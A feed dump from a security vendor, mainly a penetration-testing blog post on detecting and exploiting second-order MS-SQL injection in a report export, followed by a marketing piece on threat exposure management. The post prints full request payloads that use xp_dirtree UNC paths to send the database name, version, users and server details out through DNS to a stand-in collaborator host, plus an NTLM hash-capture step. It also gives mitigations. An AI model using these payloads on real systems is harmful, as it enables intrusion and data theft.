NetSPI https://www.netspi.com/ The Proactive Security Solution Mon, 23 Dec 2024 13:24:43 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.1 https://www.netspi.com/wp-content/uploads/2024/03/favicon.png NetSPI https://www.netspi.com/ 32 32 Exploiting Second Order SQL Injection with Stored Procedures https://www.netspi.com/blog/technical-blog/web-application-pentesting/second-order-sql-injection-with-stored-procedures-dns-based-egress/ Mon, 23 Dec 2024 03:30:00 +0000 https://www.netspi.com/?p=26186 Learn how to detect and exploit second-order SQL injection vulnerabilities using Out-of-Band (OOB) techniques, including leveraging DNS requests for data extraction.

The post Exploiting Second Order SQL Injection with Stored Procedures appeared first on NetSPI.

]]>
Introduction 

In this blog, we explore the mechanics of detecting and exploiting a second-order SQL injection vulnerability, with a focus on Out-of-Band (OOB) techniques. This method, commonly used in scenarios where direct feedback isn’t possible, involves leveraging DNS requests to send data to an external domain controlled by the tester. We’ll guide you through the process of identifying the vulnerability, understanding how DNS-based exfiltration works, and demonstrating the escalation steps that can be chained together to gain deeper insights and control. We’ll also cover key challenges and ways to troubleshoot each step along the way. 

The Vulnerability 

The application is vulnerable to an out-of-band SQL injection in a Microsoft Excel report export feature. A second-order SQL injection occurs when malicious SQL payloads are stored by one part of an application and later executed in a different context, such as a subsequent API call, without proper sanitization. This makes the vulnerability harder to detect, as the payload does not trigger immediately.

In this case, the injection vulnerability is escalated using an SQL Server UNC Path Injection via xp_dirtree, a stored procedure that triggers file directory access on the SQL server. By carefully crafting the payload, we were able to send DNS queries from the backend to an external server under our control to ultimately disclose information about the database including usernames, tables, and service account. 

Overview 

The application has an export functionality that accepts a date as input and generates an Excel report as output. Here’s what the chain of requests looks like: 

1. The server sends a request to /api/report/ with the affected parameter and provides a report ID in the response. 

HTTP Request:

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 
Accept: application/json, text/plain, */* 
Content-Type: application/json;charset=utf-8 
Content-Length: 362 
{ 
  "ReportTypeId": 36, 
  "ReportActionType": "Export", 
  "ReportParams": "{\"76\":{\"Value\":\"2024-08-15T00:00:00.000Z\",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}" 
} 

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/json; charset=utf-8 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
Strict-Transport-Security: max-age=300; includeSubDomains 
Content-Length: 38 

"79464974-a4e9-4fc8-ace0-46a5a91ca143"

2. This identifier is later used in a follow-up request to /api/report/ExportToExcel to fetch the content for the Excel file, which is then downloaded as an attachment. 

HTTP Request:

GET /api/report/ExportToExcel?reportId=79464974-a4e9-4fc8-ace0-46a5a91ca143 HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 
Accept: application/json, text/plain, */* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Te: trailers 
Connection: keep-alive 

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
content-disposition: attachment; filename=Staff2024-10-07.xlsx 
X-Server: 96722 
Strict-Transport-Security: max-age=300; includeSubDomains 
Date: Mon, 07 Oct 2024 08:39:20 GMT 
Content-Length: 6342 

PKêGY 
[TRUNCATED] 

Detection 

Injecting random data into the date parameter had no effect on the first request, which generates the report ID. However, the follow-up request /api/report/ExportToExcel to fetch the Excel file using the file ID from the /api/report response produces different results when injected with balanced versus imbalanced SQL queries. 

1. First, we will send an HTTP request to the report generation endpoint with a single quote injected into the Value JSON parameter to break the SQL syntax. 

HTTP Request:

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 
Accept: application/json, text/plain, */* 
Content-Type: application/json;charset=utf-8 
Content-Length: 362 
Connection: keep-alive 

{ 
  "ReportTypeId": 36, 
  "ReportActionType": "Export", 
  "ReportParams": "{\"76\":{\"Value\":\"2024-08-15T00:00:00.000Z'\",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}" 
}

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/json; charset=utf-8 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
X-Server: 96722 
Strict-Transport-Security: max-age=300; includeSubDomains 
Content-Length: 38 

"79464974-a4e9-4fc8-ace0-46a5a91ca143"

2. The follow-up request now returns a 500 Internal Server Error because the report ID/Excel file does not exist in the backend. This likely occurred because the server failed to fetch the requested report, which wasn’t generated in the previous step, due to an imbalanced SQL query in the date range filter.

HTTP Request:

GET /api/report/ExportToExcel?reportId=79464974-a4e9-4fc8-ace0-46a5a91ca143 HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 
Accept: application/json, text/plain, */*

HTTP Response:

HTTP/1.1 500 Internal Server Error 
Cache-Control: private 
Pragma: no-cache 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
Strict-Transport-Security: max-age=300; includeSubDomains 
Content-Length: 0 

3. Furthermore, to confirm, as soon as we balanced the SQL query by commenting out the remainder of the SQL query (e.g., 2024-10-06T00:00:00.000Z';--), the server started returning successful 200 OK response for the follow-up request with an Excel sheet. This leads us to deduce that an SQL injection vulnerability exists.

HTTP Request:

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0)  
Accept: application/json, text/plain, */* 
Content-Type: application/json;charset=utf-8 
Content-Length: 164 

{"ReportTypeId":36,"ReportActionType":"Export","ReportParams":"{\"76\":{\"Value\":\"2024-10-06T00:00:00.000Z';--\",\"DisplayValue\":\"2024-10-05T18:30:00.000Z\"}}"} 

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/json; charset=utf-8 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
X-Server: 96722 
Strict-Transport-Security: max-age=300; includeSubDomains 
Content-Length: 38 

"f5ca5f5b-f1f4-4d32-afc6-015b91a44ee4" 

HTTP Request:

GET /api/report/ExportToExcel?reportId=f5ca5f5b-f1f4-4d32-afc6-015b91a44ee4 HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 
Accept: application/json, text/plain, */* 

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
content-disposition: attachment; filename=Staff2024-10-07.xlsx 
X-Server: 96722 
Strict-Transport-Security: max-age=300; includeSubDomains 
Date: Wed, 16 Oct 2024 20:08:44 GMT 
Content-Length: 6342 

PKêGY 
[TRUNCATED] 

The next step for us was to identify the backend database. Since this was a blind SQL injection, we proceeded to test general sleep delays. The idea is to allow the server to return errors for a while due to the sleep delay. After some time, we expect the server to start providing successful responses once the report associated with the identifier we provided is generated, i.e., once the SQL query completes its execution. 

While testing for other databases yielded similar responses, Microsoft SQL stood out. Below is an example of one of the injected payloads used while testing sleep delays:  

{ 
  "ReportTypeId": 36, 
  "ReportActionType": "Export", 
  "ReportParams": "{\"76\":{\"Value\":\"2024-10-06T00:00:00.000Z';WAITFOR DELAY '0:0:20';--\",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}" 
} 

Even though the request is balanced, after issuing the above request, the server initially responds with a 500 Internal Server Error. Interestingly, after 20 seconds, reissuing the request yields a successful 200 OK response.  

Since WAITFOR delays are specific to Microsoft SQL, this confirms the backend database as Microsoft SQL.

Exploitation 

MS-SQL offers powerful stored procedures, functions, and out-of-band connections. This approach seemed promising, as it could enable a single-step attack, in contrast to the more complex two-step, time-based blind injection method mentioned earlier, which would require some automation. 

While many methods were unsuccessful, the use of out-of-band connections with xp_dirtree revealed something different. 

Here’s how the vulnerable Value parameter (which contains the date) inside the JSON ReportParams looked when it was initially sent by the application: 

"ReportParams":"{ 
               \"76\": { 
                 \"Value\":\"2024-08-22T00:00:00.000Z\", 
                 \"DisplayValue\": \"2024-08-14T18:30:00.000Z\"  
                 } 
            }"  

By injecting the required SQL query that calls the xp_dirtree stored procedure into the Value field, we were able to force the SQL server to make a bunch of DNS requests to our controlled domain. 

"ReportParams":"{ 
               \"76\": { 
               . \"Value\": \"2024-08-22T00:00:00.000Z'; DECLARE @q VARCHAR(99);SET @q='\\\\\\\\collab.domain\\\\path'; EXEC master.dbo.xp_dirtree @q;-- \", 
                 \"DisplayValue\": \"2024-08-14T18:30:00.000Z\"  
                 } 
            }" 

Here’s a simple breakdown of the SQL injection performed: 

  1. 2024-08-22T00:00:00.000Z'; : Closes an existing SQL string literal and query with ‘; and opens the door for injection. 
  2. declare @q varchar(99); : Declares a variable @q that can store up to 99 characters. 
  3. set @q='\\\\\\\\collab.domain\\\\path'; : Sets the value of @q to the UNC path \\collab.domain\path (escaped for backslashes in SQL). 
  4. exec master.dbo.xp_dirtree @q; : Executes the xp_dirtree procedure, which lists directories and subdirectories at the specified network path ( \\collab.domain\path ). 
  5. -- : The double hyphen ( -- ) is used in SQL to comment out the rest of the line. This ensures that any additional characters or commands following the injected code are ignored. 

Upon executing the payload, we received DNS requests from the server, confirming the vulnerability. 

Exfiltration via Subdomain in the UNC Path 

Next, I used DB_NAME() to confirm the database name and the system function @@SERVERNAME to grab the server name, sending both through DNS requests where the data would be exfiltrated in the subdomain. 

Extracting the Database Name 

The following payload extracts the database name and sends it as part of a DNS request: 

{ 
  "76": { 
    "Value": "2024-08-22T00:00:00.000Z';DECLARE @q NVARCHAR(256); SELECT @q = DB_NAME(); DECLARE @cmd NVARCHAR(4000); SET @cmd = '\\\\' + @q + '.collab.domain\\path'; EXEC master.dbo.xp_dirtree @cmd;-- ", 
    "DisplayValue": "2024-08-14T18:30:00.000Z" 
  } 
} 

This more or less looks like the following MS SQL query: 

DECLARE @q NVARCHAR(256);  
SELECT @q = DB_NAME();  
DECLARE @cmd NVARCHAR(4000);  
SET @cmd = '\\\\' + @q + '.collab.domain\\path';  
EXEC master.dbo.xp_dirtree @cmd;-- 
  1. DECLARE @q NVARCHAR(256); : Declares a variable @q that can hold up to 256 characters.
  2. SELECT @q = DB_NAME(); : Retrieves the current database name and stores it in @q.
  3. DECLARE @cmd NVARCHAR(4000); : Declares a variable @cmd to store the full UNC path.
  4. SET @cmd = '\\' + @q + '.collab.domain\path'; : Constructs a UNC path where the database name is part of the subdomain.
  5. EXEC master.dbo.xp_dirtree @cmd; : Executes xp_dirtree to list directories from the constructed UNC path.

Here’s the HTTP request/response for the payload:

HTTP Request:

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 
Accept: application/json, text/plain, */* 
Content-Type: application/json;charset=utf-8 
Content-Length: 362 
Connection: keep-alive 

{ 
  "ReportTypeId": 36, 
  "ReportActionType": "Export", 
  "ReportParams": "{\"76\":{\"Value\":\"2024-08-15T00:00:00.000Z';DECLARE @q NVARCHAR(256); SELECT @q = DB_NAME(); DECLARE @cmd NVARCHAR(4000); SET @cmd = '\\\\\\\\' + @q + '.adr23315c31r8pinagov0y3pkgq7eyhm6.collab.domain\\\\path'; EXEC master.dbo.xp_dirtree @cmd;--  \",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}" 
} 

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/json; charset=utf-8 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED] 
Strict-Transport-Security: max-age=300; includeSubDomains 
Date: Mon, 19 Aug 2024 13:25:08 GMT 
Content-Length: 38 

"c5cefa93-3e49-48db-927d-9838e0345ba1" 

Collaborator hit: 

staging.adr23315c31r8pinagov0y3pkgq7eyhm6.collab.domain 

Database name: staging 

Extracting the Server name 

Similarly for Server name, one can use the following payload:

DECLARE @v NVARCHAR(256);  
SELECT @v = @@SERVERNAME;  
DECLARE @cmd NVARCHAR(4000);  
SET @cmd = '\\\\\\\\' + @v + '.zrurhsfuqsfgmewco52kenhey54wsnwbl.collab.domain\\\\path';  
EXEC master.dbo.xp_dirtree @cmd;-- 

Collaborator hit:

demodb.zrurhsfuqsfgmewco52kenhey54wsnwbl.collab.domain 

Database name: demodb  

Although the responses were the same for any input provided to the vulnerable Value parameter in the /api/report endpoint, successful exploitation was confirmed through out-of-band connections using SQL Server UNC Path injection, allowing me to retrieve the database and server names. However, I ran into issues when trying to exfiltrate additional data. 

The following observations were made after failing to receive connections from the backend database on our remote server in these scenarios: 

  • Attempting to exfiltrate data containing spaces or other special characters.
  • Sending data longer than 63 characters in length. 

Subdomain and String Issues 

Upon running into the above issues and going through the contents of RFC 1035, I concluded that the SQL query was failing because one or both of the below conditions were met: 

  1. Subdomain Character Limitations
    Only alphanumeric characters and – are allowed in subdomains, similar to ARPANET host names rules.
    To ensure the data extracted via the subdomain names does not contain any bad characters, a REPLACE() function can be added to clean up bad characters. 
  2. Subdomain Length Restrictions
    While the maximum length of a domain name is restricted to 255 octets, DNS subdomains/labels are limited to only a maximum of 63 characters long, which justifies the earlier restrictions faced.
    To deal with long strings like version numbers, we will be using SUBSTRING() to extract data piece by piece. 

Extracting SQL Server Version 

The following HTTP request was issued that extracts the first 50 characters of the SQL server version. Only 50 chars requested since the data to be extracted will fall into a multi-level subdomain which has a maximum of 63 chars length. 

e.g [EXFIL DATA].[SUBDOMAIN].collab.domain 

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 
Accept: application/json, text/plain, */* 
Content-Type: application/json;charset=utf-8 
Content-Length: 532

{"ReportTypeId":36,"ReportActionType":"Export","ReportParams":"{\"76\":{\"Value\":\"2024-08-15T00:00:00.000Z';DECLARE @q NVARCHAR(256); SELECT @q = SUBSTRING(@@VERSION, 1, 50); SELECT @q = REPLACE(@q, c.value, 'X') FROM (VALUES (' '),('/'),('-'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value);  DECLARE @cmd NVARCHAR(4000); SET @cmd = '\\\\\\\\' + @q + '.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain\\\\path'; EXEC master.dbo.xp_dirtree @cmd;--  \",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}"} 
DECLARE @q NVARCHAR(256);  
SELECT @q = SUBSTRING(@@VERSION, 0, 50);  
SELECT @q = REPLACE(@q, c.value, '-') FROM (VALUES (' '),('/'),('-'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value);   

DECLARE @cmd NVARCHAR(4000);  
SET @cmd = '\\\\\\\\' + @q + '.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain\\\\path';  

EXEC master.dbo.xp_dirtree @cmd;-- 

The payload translates to the following SQL query: 

  1. DECLARE @q NVARCHAR(256); : Declares a variable @q to store part of the SQL Server version.
  2. SELECT @q = SUBSTRING(@@VERSION, 0, 50); : Extracts the first 50 characters of the SQL Server version using @@VERSION and stores it in @q.
  3. SELECT @q = REPLACE(@q, c.value, '-') FROM (VALUES (' '),('/'),('-'),(':'),(CHAR(13)),(CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value); : Replaces special characters (spaces, slashes, hyphens, etc.) including characters like carriage return, line feed and tabs in the extracted version string with the character - , sanitizing the value in @q.
  4. DECLARE @cmd NVARCHAR(4000); : Declares a variable @cmd to store the full UNC path.
  5. SET @cmd = '\\\\' + @q + '.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain\\path'; : Constructs the UNC path, embedding the sanitized version string as a subdomain in the domain i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain and appending \\path.
  6. EXEC master.dbo.xp_dirtree @cmd; : Executes xp_dirtree to list directories from the constructed UNC path, exfiltrating the SQL Server version string via the subdomain in a DNS request.

To fetch the next 50 characters of the SQL Server version, you can modify the SUBSTRING function’s offset: SUBSTRING(@@VERSION, 50, 50);.

Collaborator hits:

Microsoft-SQL-Server-2019--RTM-CU27-GDR---KB50409.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

48----15.0.4382.1--X64----Jul--1-2024-20-03-23---C.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

opyright--C--2019-Microsoft-Corporation--Enterpris.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

e-edition--core-based-licensing--64-bit--on-window.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

s-Server-2019-Standard-10.0--X64---Build-17763----.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

-Hypervisor--.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

MS-SQL Version:

$ awk -F'.' '{print $1}' version | sed 's/-/ /g; s/  */ /g' | tr -d '\n' 

Microsoft SQL Server 2019 RTM CU27 GDR KB5040948 15.0.4382.1 X64 Jul 1 2024 20 03 23 Copyright C 2019 Microsoft Corporation Enterprise Edition Core based Licensing 64 bit on Windows Server 2019 Standard 10.0 X64 Build 17763 Hypervisor 

Extracting the list of DBs present 

DECLARE @cmd NVARCHAR(4000);  

SET @cmd = '\\\\\\\\' + (SELECT name FROM master..sysdatabases ORDER BY name OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY) + '.9bl112z4a2zq6ogm8fmuyx1oifo6c29qy.collab.domain\\\\path'; 

SELECT @cmd = REPLACE(@cmd, c.value, '-') FROM (VALUES (' '),('/'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value);  

EXEC master.dbo.xp_dirtree @cmd;-- 

By adjusting the OFFSET value in OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY , we were able to retrieve different databases from the sysdatabases table. 

Collaborator hit:

staging.9bl112z4a2zq6ogm8fmuyx1oifo6c29qy.collab.domain 
master.9bl112z4a2zq6ogm8fmuyx1oifo6c29qy.collab.domain
… 

Database names:

$ cat output | awk -F'.' '{print $1}' 
staging 
master 
… 

While querying master..sysdatabases was a useful approach, using DB_NAME(1) , DB_NAME(2) , and so on, provided an equally effective, if not better, means to achieve similar results. 

Dumping all the users and roles 

The sys.database_principals proved to be a good resource to provide information about database users, roles, and schemas. 

SQL query: 

DECLARE @cmd NVARCHAR(4000);  

SET @cmd = '\\\\\\\\' + (SELECT name FROM sys.database_principals ORDER BY name OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY) + '.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain\\\\path';  

SELECT @cmd = REPLACE(@cmd, c.value, '-') FROM (VALUES (' '),('/'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value);  

EXEC master.dbo.xp_dirtree @cmd;-- 

Collaborator hits: 

guest.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain 
dbo.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain 
INFORMATION_SCHEMA.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain 
public.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain 
sys.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain 
… 

User/role names: 

$ awk -F'.' '{print $1}' 
guest 
dbo 
INFORMATION_SCHEMA 
public 
sys 
… 

The list does not indicate which of these users is the current user. The next section demonstrates how we identified the current user. 

Getting the current user and permissions 

While other methods to fetch the current user may not work, a simple approach is to query the sys.sysusers table to identify the current user. This can be done by comparing the uid from sys.sysusers with the value returned by USER_ID()

SQL Payload: 

DECLARE @cmd NVARCHAR(4000);  

SET @cmd = '\\\\\\\\' + (SELECT name FROM sys.sysusers WHERE uid = USER_ID()) + '.r2ujskqm1kq8x674zxdcpfs69xfo3k78w.collab.domain\\\\path';  

SELECT @cmd = REPLACE(@cmd, c.value, '-') FROM (VALUES (' '),('/'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value);  
EXEC master.dbo.xp_dirtree @cmd;-- 
POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0)  
Content-Type: application/json;charset=utf-8 
Content-Length: 513 

{"ReportTypeId":36,"ReportActionType":"Export","ReportParams":"{\"76\":{\"Value\":\"2024-08-15T00:00:00.000Z'; DECLARE @cmd NVARCHAR(4000); SET @cmd = '\\\\\\\\' + (SELECT name FROM sys.sysusers WHERE uid = USER_ID()) + '.r2ujskqm1kq8x674zxdcpfs69xfo3k78w.collab.domain\\\\path'; SELECT @cmd = REPLACE(@cmd, c.value, '-') FROM (VALUES (' '),('/'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value); EXEC master.dbo.xp_dirtree @cmd;--  \",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}"} 

HTTP Request: 

0.r2ujskqm1kq8x674zxdcpfs69xfo3k78w.collab.domain

Collaborator hit:

DECLARE @q NVARCHAR(256);  
SELECT @q = is_srvrolemember('sysadmin');  
DECLARE @cmd NVARCHAR(4000);  
SET @cmd = '\\\\\\\\' + @q + '.s4xkulsn3ls9z7951yfdrgu7byhp5g34s.collab.domain\\\\path';  
EXEC master.dbo.xp_dirtree @cmd;-- 

Unfortunately, the username returned as public, which has minimal permissions. To check if the user is a sysadmin, we can use the following payload: 

Collaborator hit:

0.r2ujskqm1kq8x674zxdcpfs69xfo3k78w.collab.domain 

The result indicates that the user is not a sysadmin, returning false.

Stealing NetNLM hashes with xp_dirtree

We can also attempt to capture NTLMv2 hashes that may be used for authentication by setting up an SMB server (such as impacket-smbserver or Responder). 

To reach out to our SMB server, we can execute the following xp_dirtree query: 

EXEC master.dbo.xp_dirtree '\\\\\\\\collab.domain\\\\path'; 

For more details on related techniques and considerations, refer to our previous blogs on executing SMB relay attacks via SQL Server and SQL Server link crawling with PowerUpSQL

Mitigations 

To enhance security against SQL injection attacks, here re some mitigations we recommend: 

  1. Parameterized Queries: Always use parameterized queries to handle user input securely. 
  2. Data Type Enforcement and Input Filtering: Strictly define acceptable data types (e.g., strings, alphanumeric characters) for all inputs. Also, implement data input filters to remove potentially harmful characters, using allowlists and regular expressions. 
  3. Database Hardening: Secure the database server to prevent unauthorized data access. 
  4. Generic Error Messages: Disable detailed error messages that expose sensitive information. Use generic error messages instead, directing users to contact IT or the web administrator. 
  5. Principle of Least Privilege: Apply the principle of least privilege when assigning permissions to limit the impact of SQL injection attacks. Use a non-privileged service account to run the database server, ensuring the database user lacks administrative privileges. 

Summary 

In this engaging penetration test, we successfully uncovered a second order MS-SQL injection vulnerability using an Out-of-Band (OOB) technique. This approach allowed us to exfiltrate sensitive data by leveraging stored procedures, specifically xp_dirtree, which is particularly useful for making network requests and accessing file systems within SQL Server environments. 

Due to time constraints, we could not explore additional exploitation paths, such as multi-step time-based blind SQL injection. Instead, we utilized an Interactsh server to automate the capture of Out-of-Band calls directed to our collaborator server. This method streamlined the process of data exfiltration, demonstrating the effectiveness of OOB techniques in SQL injection scenarios. 

Navigating the intricacies of SQL injection posed several challenges, particularly in managing character limits and other special conditions. Each hurdle we encountered underscored the complexity and excitement of web application security testing. The experience highlighted the delicate balance between vulnerability discovery and exploitation in real-world applications, reinforcing the critical need for robust security measures in database management systems. 

This test not only showcased our technical capabilities but also illuminated the broader implications of SQL injection vulnerabilities and their potential impact on organizational security. 

Thank you for reading! 

We hope these insights and recommendations help enhance your application’s security against SQL injection attacks. 

The post Exploiting Second Order SQL Injection with Stored Procedures appeared first on NetSPI.

]]>
CTEM Defined: The Fundamentals of Continuous Threat Exposure Management https://www.netspi.com/blog/executive-blog/proactive-security/ctem-defined-the-fundamentals-of-continuous-threat-exposure-management/ Thu, 19 Dec 2024 13:45:00 +0000 https://www.netspi.com/?p=26179 Learn how continuous threat exposure management (CTEM) boosts cybersecurity with proactive strategies to assess, manage, and reduce risks.

The post CTEM Defined: The Fundamentals of Continuous Threat Exposure Management appeared first on NetSPI.

]]>
Cybersecurity challenges evolve daily, and organizations recognize the need to enhance their strategies to stay ahead of potential threats. Traditional vulnerability management frameworks are no longer enough to address the complex and expanding attack surface that enterprises face today. This is where continuous threat exposure management (CTEM) emerges as a powerful process for cybersecurity programs.

CTEM Definition: What is Continuous Threat Exposure Management?

CTEM is more than just a buzzword — it’s a vital shift in how organizations view and manage their security posture. A recent article in BizTech Magazine highlights experts’ insights on CTEM. In the article, Erik Nost of Forrester describes CTEM as “a new approach that unifies various proactive security solutions, offering a comprehensive view of vulnerabilities, visibility, and response orchestration.” By enabling continuous assessment of digital and physical assets for exposure, accessibility, and exploitability, CTEM provides a proactive approach to identifying and addressing modern threats. Now more than ever, proactive security strategies are critical in mitigating risks before they become full-blown security incidents, and in ensuring organizations stay cyber resilient.

According to Gartner, “What’s needed is a continuous threat exposure management (CTEM) program that surfaces and actively prioritizes whatever most threatens your business. Creating any such program requires a five-step process.”

According to Gartner, “What’s needed is a continuous threat exposure management (CTEM) program that surfaces and actively prioritizes whatever most threatens your business. Creating any such program requires a five-step process.” It allows organizations to continuously assess the accessibility, visibility, and exploitability of their digital environments. Unlike traditional risk-based vulnerability management (RBVM), CTEM expands beyond identifying vulnerabilities. It includes governance, process optimization, and long-term improvements to ensure vulnerabilities are remediated.

At its core, CTEM serves as a broader exposure management process that proactively minimizes risks while optimizing how organizations address and resolve security gaps. By integrating process improvement with technical threat assessments, CTEM shifts organizations from reactive to proactive security operations.

5 Steps to Implement a CTEM Program

1. Scoping Process

Start by defining the scope of objectives and aligning them with your business priorities. During this process, you want to identify sensitive assets, evaluate potential impacts, and foster collaboration across your organization to establish a focused, business-aligned scope for managing threats.

2. Discovery Process

Consider using a combination of penetration tests and an attack surface management solution to gain visibility of all known and hidden assets. Penetration testing is an effective point-in-time test that provides a snapshot of how vulnerable your critical assets are, so you can prioritize what matters most in the next step of CTEM. Using an attack surface management solution will give you continuous visibility into all hidden and known assets and manage the attack surface. These insights help you establish a clear understanding of your threat landscape.

3. Prioritization Process

Not every risk can be remediated immediately, so focus your resources on those with the highest potential impact. Balance technical severity with business relevance to ensure that you’re addressing the most critical vulnerabilities first, particularly those most likely to be exploited.

4. Validation Process

Test and retest your vulnerabilities to verify if they can be exploited, and ensure that mitigation efforts are effective. This is where breach and attack simulation, red teaming exercises, and additional penetration tests can validate the efficacy of your security program and remediation efforts.

5. Mobilization Process

Remediate high-risk vulnerabilities, track progress, and develop ongoing strategic plans for threat management. Mobilization also requires communication and training across your organization to ensure adoption and incremental improvement in CTEM practices.

What Are the Benefits of Adopting CTEM?

Adopting CTEM provides multiple advantages for enterprises aiming to stay ahead of the evolving landscape and improving cyber resiliency.

Maximize Security Resources

By prioritizing vulnerabilities and addressing critical threats early, CTEM allows for more efficient allocation of security resources. According to Gartner, “By 2026, Gartner predicts that organizations prioritizing their security investments based on a CTEM program will realize a two-thirds reduction in breaches.” This shift to proactive security preventing breaches will allow security teams to maximize their resources.

By prioritizing vulnerabilities and addressing critical threats early, CTEM allows for more efficient allocation of security resources.

Stay Ahead of Bad Actors

Cyberthreats evolve at an alarming pace, and CTEM empowers security teams to adapt just as quickly. Continuous exposure assessment and remediation equips security teams to address vulnerabilities before bad actors exploit them, minimizing risks and response times.

Build Long-Term Cyber Resilience

Beyond addressing immediate threats, CTEM emphasizes continuous improvement in both processes and governance. This holistic approach doesn’t just repair security gaps — it helps prevent similar vulnerabilities from emerging again. Over time, this drives long-term risk reduction.

How Does NetSPI Align with a CTEM Program?

NetSPI takes a proactive approach to cybersecurity programs by embedding CTEM principles directly into The NetSPI Platform, enabling you to align your security efforts with the CTEM process: scoping, discovery, prioritization, validation, and mobilization. The Platform includes Attack Surface Management, Penetration Testing as a Service, and Breach and Attack Simulation solutions, which all work together to support your alignment with CTEM and achieve consistent threat exposure management outcomes.

Penetration Testing as a Service (PTaaS)

